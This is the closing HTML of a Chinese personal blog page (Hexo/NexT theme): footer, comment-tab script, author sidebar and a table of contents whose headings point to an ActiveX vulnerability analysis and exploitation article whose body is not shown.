    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E6%8F%8F%E8%BF%B0"><span class="nav-text">漏洞描述</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x00-ActiveX%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86"><span class="nav-text">0x00 ActiveX基础知识</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E4%BB%80%E4%B9%88%E6%98%AFActiveX"><span class="nav-text">1.什么是ActiveX</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-ActiveX%E9%80%86%E5%90%91%E5%88%86%E6%9E%90%E5%9F%BA%E7%A1%80"><span class="nav-text">2.ActiveX逆向分析基础</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#classid"><span class="nav-text">classid</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%86%E5%8F%91%E5%87%BD%E6%95%B0"><span class="nav-text">分发函数</span></a></li><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%88%86%E6%9E%90%E6%96%B9%E6%B3%95"><span class="nav-text">分析方法</span></a></li></ol></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-ActiveX%E7%9A%84%E4%BD%BF%E7%94%A8"><span class="nav-text">3.ActiveX的使用</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E9%92%88%E5%AF%B9ActiveX%E6%8E%A7%E4%BB%B6%E7%9A%84%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90%E6%96%B9%E6%B3%95"><span class="nav-text">0x01 针对ActiveX控件的漏洞分析方法</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%85%B3%E4%BA%8EActiveX%E6%8E%A7%E4%BB%B6%E4%B8%AD%E7%9A%84%E5%87%BD%E6%95%B0%E8%B0%83%E8%AF%95%E8%B7%9F%E8%BF%9B%EF%BC%8C%E5%8F%AF%E4%BD%BF%E7%94%A8%E4%BB%A5%E4%B8%8B%E6%96%B9%E6%B3%95"><span class="nav-text">关于ActiveX控件中的函数调试跟进，可使用以下方法</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E6%BC%8F%E6%B4%9E%E5%88%A9%E7%94%A8"><span class="nav-text">0x02 漏洞利用</span></a></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="dreamfoil"
      src="/images/avatar.jpg">
  <p class="site-author-name" itemprop="name">dreamfoil</p>
  <div class="site-description" itemprop="description">独立之精神，自由之思想。</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">14</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="mailto:1224825643@qq.com" title="E-Mail → mailto:1224825643@qq.com" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">dreamfoil</span>
</div>

 <!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div> -->

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
